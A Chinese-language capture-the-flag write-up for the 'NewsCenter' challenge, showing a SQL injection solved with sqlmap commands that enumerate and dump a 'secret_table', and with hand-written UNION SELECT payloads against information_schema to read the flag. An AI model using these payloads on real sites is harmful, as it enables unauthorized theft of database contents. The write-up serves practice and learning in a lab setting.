攻防世界做题记录-NewsCenter

NewsCenter

进入界面

是一个明显的SQL注入题目

（前面的图由于先存在word再复制过来所有略微有点小糊）

sqlmap

首先使用工具偷个懒

随意的输入一个BEACON

Burp Suite抓包

存为TXT文件（我这里存为 NEWSCENTER.txt ）

放入sqlmap目录

打开大杀器-sqlmap

查找数据库

 sqlmap>python sqlmap.py -r NEWSCENTER.txt –dbs

 

查找表

 python sqlmap.py -r NEWSCENTER.txt --tables -D news

 

查找列名

 python sqlmap.py -r NEWSCENTER.txt --column -D news -T secret_table

 

看到了希望，读取它就🆗啦

 python sqlmap.py -r NEWSCENTER.txt --dump -D news -T secret_table -C fl4g

 

纯手工

来一个基本的 ' union select 1,2,3 # 

提示就来了

  ' and 0 union select 1,TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA.COLUMNS #  

 ' and 0 union select 1,column_name,data_type from information_schema.columns where table_name='news'# 

 ' and 0 union select 1,column_name,data_type from information_schema.columns where table_name='secret_table'# 

 ' and 0 union select 1,2,fl4g from secret_table #

个人对sql注入的语句还不够熟悉

手动注入的时候还是得开卷

下次整理一份sql注入语句

具体使用在资料中有网上找到的常用sql语句

资料

sql注入：常用sql注入语句

sqlmap：sqlmap使用